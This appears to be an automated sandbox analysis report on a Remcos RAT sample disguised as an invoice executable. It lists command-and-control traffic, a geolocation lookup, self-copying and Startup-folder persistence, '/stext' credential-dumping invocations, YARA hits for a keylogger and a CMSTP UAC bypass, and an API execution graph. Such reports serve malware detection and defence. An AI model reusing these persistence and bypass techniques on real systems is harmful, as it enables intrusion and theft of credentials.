                                                                          Dec 3, 2024 15:42:09.820159912 CET4971080192.168.2.10178.237.33.50
                                                                          Dec 3, 2024 15:42:14.708101034 CET4971080192.168.2.10178.237.33.50
                                                                          Dec 3, 2024 15:42:24.317421913 CET4971080192.168.2.10178.237.33.50
                                                                          Dec 3, 2024 15:42:38.466481924 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:42:38.469440937 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:42:38.589555025 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:43:08.479042053 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:43:08.489214897 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:43:08.609319925 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:43:38.494538069 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:43:38.495995998 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:43:38.616553068 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:44:08.510426998 CET878749703192.210.150.26192.168.2.10
                                                                          Dec 3, 2024 15:44:08.511995077 CET497038787192.168.2.10192.210.150.26
                                                                          Dec 3, 2024 15:44:08.632178068 CET878749703192.210.150.26192.168.2.10

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 3, 2024 15:40:15.010523081 CET5883753192.168.2.101.1.1.1
                                                                          Dec 3, 2024 15:40:15.150598049 CET53588371.1.1.1192.168.2.10

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 3, 2024 15:40:15.010523081 CET192.168.2.101.1.1.10xe716Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 3, 2024 15:40:15.150598049 CET1.1.1.1192.168.2.100xe716No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • geoplugin.net

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.1049710178.237.33.50807744C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 3, 2024 15:40:15.279390097 CET71OUTGET /json.gp HTTP/1.1
                                                                          Host: geoplugin.net
                                                                          Cache-Control: no-cache
                                                                          Dec 3, 2024 15:40:16.569276094 CET1171INHTTP/1.1 200 OK
                                                                          date: Tue, 03 Dec 2024 14:40:16 GMT
                                                                          server: Apache
                                                                          content-length: 963
                                                                          content-type: application/json; charset=utf-8
                                                                          cache-control: public, max-age=300
                                                                          access-control-allow-origin: *
                                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                                          Data Ascii: { "geoplugin_request":"8.46.123.228", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:09:40:08
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\Desktop\z49FACTURA-0987678.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\z49FACTURA-0987678.exe"
                                                                          Imagebase:0xed0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:09:40:09
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\z49FACTURA-0987678.exe"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 26%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:3
                                                                          Start time:09:40:09
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3760192225.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3758537352.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3761526456.000000000402F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:5
                                                                          Start time:09:40:15
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\ntpiwvxpqbhwumsvyl"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:6
                                                                          Start time:09:40:15
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\pvdaxohiejzjxsohpwwof"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:7
                                                                          Start time:09:40:15
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\apitxysksrrohzclyhjpqrrk"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:8
                                                                          Start time:09:40:21
                                                                          Start date:03/12/2024
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs"
                                                                          Imagebase:0x7ff73e7f0000
                                                                          File size:170'496 bytes
                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:9
                                                                          Start time:09:40:21
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:10
                                                                          Start time:09:40:22
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:11
                                                                          Start time:09:40:23
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:13
                                                                          Start time:09:40:24
                                                                          Start date:03/12/2024
                                                                          Path:C:\Users\user\AppData\Local\acceptancy\turbinals.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                                                                          Imagebase:0xce0000
                                                                          File size:875'008 bytes
                                                                          MD5 hash:876F47F33C5975497C15BF24D50952B5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1465257785.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:3.3%
                                                                            Dynamic/Decrypted Code Coverage:0.5%
                                                                            Signature Coverage:10.1%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:174
                                                                            execution_graph 104092 1027a50 104093 1027a60 104092->104093 104094 1027b7a LoadLibraryA 104093->104094 104099 1027bbf VirtualProtect VirtualProtect 104093->104099 104095 1027b91 104094->104095 104095->104093 104098 1027ba3 GetProcAddress 104095->104098 104097 1027c24 104097->104097 104098->104095 104100 1027bb9 ExitProcess 104098->104100 104099->104097 104101 ed1078 104106 ed708b 104101->104106 104103 ed108c 104137 ef2d40 104103->104137 104107 ed709b __ftell_nolock 104106->104107 104140 ed7667 104107->104140 104111 ed715a 104152 ef050b 104111->104152 104118 ed7667 59 API calls 104119 ed718b 104118->104119 104171 ed7d8c 104119->104171 104121 ed7194 RegOpenKeyExW 104122 f0e8b1 RegQueryValueExW 104121->104122 104123 ed71b6 Mailbox 104121->104123 104124 f0e943 RegCloseKey 104122->104124 104125 f0e8ce 104122->104125 104123->104103 104124->104123 104136 f0e955 _wcscat Mailbox __NMSG_WRITE 104124->104136 104175 ef0db6 104125->104175 104127 f0e8e7 104185 ed522e 104127->104185 104128 ed79f2 59 API calls 104128->104136 104131 f0e90f 104188 ed7bcc 104131->104188 104133 f0e929 104133->104124 104135 ed3f74 59 API calls 104135->104136 104136->104123 104136->104128 104136->104135 104197 ed7de1 104136->104197 104262 ef2c44 104137->104262 104139 ed1096 104141 ef0db6 Mailbox 59 API calls 104140->104141 104142 ed7688 104141->104142 104143 ef0db6 Mailbox 59 API calls 104142->104143 104144 ed7151 104143->104144 104145 ed4706 104144->104145 104201 f01940 104145->104201 104148 ed7de1 59 API calls 104149 ed4739 104148->104149 104203 ed4750 104149->104203 104151 ed4743 Mailbox 104151->104111 104153 f01940 __ftell_nolock 104152->104153 104154 ef0518 GetFullPathNameW 104153->104154 104155 ef053a 104154->104155 104156 ed7bcc 59 API calls 104155->104156 104157 ed7165 104156->104157 104158 ed7cab 104157->104158 104159 ed7cbf 104158->104159 104160 f0ed4a 104158->104160 104225 ed7c50 104159->104225 104230 ed8029 104160->104230 104163 ed7173 104165 ed3f74 104163->104165 104164 f0ed55 __NMSG_WRITE _memmove 104166 ed3f82 104165->104166 104170 ed3fa4 _memmove 104165->104170 104168 ef0db6 Mailbox 59 API calls 104166->104168 104167 ef0db6 Mailbox 59 API calls 104169 ed3fb8 104167->104169 104168->104170 104169->104118 104170->104167 104172 ed7da6 104171->104172 104174 ed7d99 104171->104174 104173 ef0db6 Mailbox 59 API calls 104172->104173 104173->104174 104174->104121 104177 ef0dbe 104175->104177 104178 ef0dd8 104177->104178 104180 ef0ddc std::exception::exception 104177->104180 104233 ef571c 104177->104233 104250 ef33a1 RtlDecodePointer 104177->104250 104178->104127 104251 ef859b RaiseException 104180->104251 104182 ef0e06 104252 ef84d1 58 API calls _free 104182->104252 104184 ef0e18 104184->104127 104186 ef0db6 Mailbox 59 API calls 104185->104186 104187 ed5240 RegQueryValueExW 104186->104187 104187->104131 104187->104133 104189 ed7bd8 __NMSG_WRITE 104188->104189 104190 ed7c45 104188->104190 104192 ed7bee 104189->104192 104193 ed7c13 104189->104193 104191 ed7d2c 59 API calls 104190->104191 104196 ed7bf6 _memmove 104191->104196 104261 ed7f27 59 API calls Mailbox 104192->104261 104195 ed8029 59 API calls 104193->104195 104195->104196 104196->104133 104198 ed7df0 __NMSG_WRITE _memmove 104197->104198 104199 ef0db6 Mailbox 59 API calls 104198->104199 104200 ed7e2e 104199->104200 104200->104136 104202 ed4713 GetModuleFileNameW 104201->104202 104202->104148 104204 f01940 __ftell_nolock 104203->104204 104205 ed475d GetFullPathNameW 104204->104205 104206 ed477c 104205->104206 104207 ed4799 104205->104207 104208 ed7bcc 59 API calls 104206->104208 104209 ed7d8c 59 API calls 104207->104209 104210 ed4788 104208->104210 104209->104210 104213 ed7726 104210->104213 104214 ed7734 104213->104214 104217 ed7d2c 104214->104217 104216 ed4794 104216->104151 104218 ed7d43 _memmove 104217->104218 104219 ed7d3a 104217->104219 104218->104216 104219->104218 104221 ed7e4f 104219->104221 104222 ed7e62 104221->104222 104224 ed7e5f _memmove 104221->104224 104223 ef0db6 Mailbox 59 API calls 104222->104223 104223->104224 104224->104218 104226 ed7c5f __NMSG_WRITE 104225->104226 104227 ed8029 59 API calls 104226->104227 104228 ed7c70 _memmove 104226->104228 104229 f0ed07 _memmove 104227->104229 104228->104163 104231 ef0db6 Mailbox 59 API calls 104230->104231 104232 ed8033 104231->104232 104232->104164 104234 ef5797 104233->104234 104241 ef5728 104233->104241 104259 ef33a1 RtlDecodePointer 104234->104259 104236 ef579d 104260 ef8b28 58 API calls __getptd_noexit 104236->104260 104239 ef575b RtlAllocateHeap 104239->104241 104249 ef578f 104239->104249 104241->104239 104242 ef5783 104241->104242 104246 ef5733 104241->104246 104247 ef5781 104241->104247 104256 ef33a1 RtlDecodePointer 104241->104256 104257 ef8b28 58 API calls __getptd_noexit 104242->104257 104246->104241 104253 efa16b 58 API calls 2 library calls 104246->104253 104254 efa1c8 58 API calls 6 library calls 104246->104254 104255 ef309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104246->104255 104258 ef8b28 58 API calls __getptd_noexit 104247->104258 104249->104177 104250->104177 104251->104182 104252->104184 104253->104246 104254->104246 104256->104241 104257->104247 104258->104249 104259->104236 104260->104249 104261->104196 104263 ef2c50 _flsall 104262->104263 104270 ef3217 104263->104270 104269 ef2c77 _flsall 104269->104139 104287 ef9c0b 104270->104287 104272 ef2c59 104273 ef2c88 RtlDecodePointer RtlDecodePointer 104272->104273 104274 ef2c65 104273->104274 104275 ef2cb5 104273->104275 104284 ef2c82 104274->104284 104275->104274 104333 ef87a4 59 API calls ___crtsetenv 104275->104333 104277 ef2d18 RtlEncodePointer RtlEncodePointer 104277->104274 104278 ef2cc7 104278->104277 104279 ef2cec 104278->104279 104334 ef8864 61 API calls 2 library calls 104278->104334 104279->104274 104282 ef2d06 RtlEncodePointer 104279->104282 104335 ef8864 61 API calls 2 library calls 104279->104335 104282->104277 104283 ef2d00 104283->104274 104283->104282 104336 ef3220 104284->104336 104288 